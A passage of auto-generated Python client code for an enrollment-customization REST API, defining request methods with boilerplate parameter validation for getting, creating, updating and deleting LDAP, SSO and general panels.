body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/all/{panel-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_all_panel_id_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single Panel for a single Enrollment Customization # noqa: E501
Get a single panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_panel_id_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanel
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_all_panel_id_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_all_panel_id_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single Panel for a single Enrollment Customization # noqa: E501
Get a single panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_all_panel_id_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanel, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_all_panel_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_all_panel_id_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_all_panel_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanel",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/all/{panel-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_ldap_panel_id_delete(self, id, panel_id, **kwargs): # noqa: E501
"""Delete an LDAP single panel from an Enrollment Customization # noqa: E501
Delete an LDAP single Panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_delete(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_ldap_panel_id_delete_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_ldap_panel_id_delete_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Delete an LDAP single panel from an Enrollment Customization # noqa: E501
Delete an LDAP single Panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_delete_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_ldap_panel_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_ldap_panel_id_delete`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_ldap_panel_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/ldap/{panel-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_ldap_panel_id_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single LDAP panel for a single Enrollment Customization # noqa: E501
Get a single LDAP panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelLdapAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_ldap_panel_id_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_ldap_panel_id_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single LDAP panel for a single Enrollment Customization # noqa: E501
Get a single LDAP panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelLdapAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_ldap_panel_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_ldap_panel_id_get`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_ldap_panel_id_get`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelLdapAuth",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/ldap/{panel-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_ldap_panel_id_put(self, id, panel_id, enrollment_customization_panel_ldap_auth, **kwargs): # noqa: E501
"""Update a single LDAP Panel for a single Enrollment Customization # noqa: E501
Update a single LDAP panel for a single enrollment customization. If multiple LDAP access groups are defined with the same name and id, only one will be saved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_put(id, panel_id, enrollment_customization_panel_ldap_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_ldap_auth: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_ldap_auth: EnrollmentCustomizationPanelLdapAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelLdapAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_ldap_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_ldap_auth, **kwargs) # noqa: E501
def v1_enrollment_customization_id_ldap_panel_id_put_with_http_info(self, id, panel_id, enrollment_customization_panel_ldap_auth, **kwargs): # noqa: E501
"""Update a single LDAP Panel for a single Enrollment Customization # noqa: E501
Update a single LDAP panel for a single enrollment customization. If multiple LDAP access groups are defined with the same name and id, only one will be saved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_panel_id_put_with_http_info(id, panel_id, enrollment_customization_panel_ldap_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param enrollment_customization_panel_ldap_auth: Enrollment Customization Panel to update (required)
:type enrollment_customization_panel_ldap_auth: EnrollmentCustomizationPanelLdapAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelLdapAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id',
'enrollment_customization_panel_ldap_auth'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_ldap_panel_id_put" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_ldap_panel_id_put`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_ldap_panel_id_put`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_ldap_auth' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_ldap_auth' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_ldap_auth'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_ldap_auth` when calling `v1_enrollment_customization_id_ldap_panel_id_put`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_ldap_auth' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_ldap_auth']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
200: "GetEnrollmentCustomizationPanelLdapAuth",
404: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/ldap/{panel-id}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_ldap_post(self, id, enrollment_customization_panel_ldap_auth, **kwargs): # noqa: E501
"""Create an LDAP Panel for a single Enrollment Customization # noqa: E501
Create an LDAP panel for a single enrollment customization. If multiple LDAP access groups are defined with the same name and id, only one will be saved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_post(id, enrollment_customization_panel_ldap_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_ldap_auth: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_ldap_auth: EnrollmentCustomizationPanelLdapAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelLdapAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_ldap_post_with_http_info(id, enrollment_customization_panel_ldap_auth, **kwargs) # noqa: E501
def v1_enrollment_customization_id_ldap_post_with_http_info(self, id, enrollment_customization_panel_ldap_auth, **kwargs): # noqa: E501
"""Create an LDAP Panel for a single Enrollment Customization # noqa: E501
Create an LDAP panel for a single enrollment customization. If multiple LDAP access groups are defined with the same name and id, only one will be saved. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_ldap_post_with_http_info(id, enrollment_customization_panel_ldap_auth, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param enrollment_customization_panel_ldap_auth: Enrollment Customization Panel to create (required)
:type enrollment_customization_panel_ldap_auth: EnrollmentCustomizationPanelLdapAuth
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelLdapAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'enrollment_customization_panel_ldap_auth'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_ldap_post" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_ldap_post`") # noqa: E501
# verify the required parameter 'enrollment_customization_panel_ldap_auth' is set
if self.api_client.client_side_validation and ('enrollment_customization_panel_ldap_auth' not in local_var_params or # noqa: E501
local_var_params['enrollment_customization_panel_ldap_auth'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `enrollment_customization_panel_ldap_auth` when calling `v1_enrollment_customization_id_ldap_post`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'enrollment_customization_panel_ldap_auth' in local_var_params:
body_params = local_var_params['enrollment_customization_panel_ldap_auth']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {
201: "GetEnrollmentCustomizationPanelLdapAuth",
400: "ApiError",
}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/ldap', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_sso_panel_id_delete(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single SSO Panel from an Enrollment Customization # noqa: E501
Delete a single SSO panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_delete(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_sso_panel_id_delete_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_sso_panel_id_delete_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Delete a single SSO Panel from an Enrollment Customization # noqa: E501
Delete a single SSO panel from an Enrollment Customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_delete_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: None
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_sso_panel_id_delete" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `v1_enrollment_customization_id_sso_panel_id_delete`") # noqa: E501
# verify the required parameter 'panel_id' is set
if self.api_client.client_side_validation and ('panel_id' not in local_var_params or # noqa: E501
local_var_params['panel_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `panel_id` when calling `v1_enrollment_customization_id_sso_panel_id_delete`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'panel_id' in local_var_params:
path_params['panel-id'] = local_var_params['panel_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
response_types_map = {}
return self.api_client.call_api(
'/v1/enrollment-customization/{id}/sso/{panel-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def v1_enrollment_customization_id_sso_panel_id_get(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single SSO Panel for a single Enrollment Customization # noqa: E501
Get a single SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_get(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: GetEnrollmentCustomizationPanelSsoAuth
"""
kwargs['_return_http_data_only'] = True
return self.v1_enrollment_customization_id_sso_panel_id_get_with_http_info(id, panel_id, **kwargs) # noqa: E501
def v1_enrollment_customization_id_sso_panel_id_get_with_http_info(self, id, panel_id, **kwargs): # noqa: E501
"""Get a single SSO Panel for a single Enrollment Customization # noqa: E501
Get a single SSO panel for a single enrollment customization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.v1_enrollment_customization_id_sso_panel_id_get_with_http_info(id, panel_id, async_req=True)
>>> result = thread.get()
:param id: Enrollment Customization identifier (required)
:type id: int
:param panel_id: Panel object identifier (required)
:type panel_id: int
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(GetEnrollmentCustomizationPanelSsoAuth, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'id',
'panel_id'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method v1_enrollment_customization_id_sso_panel_id_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
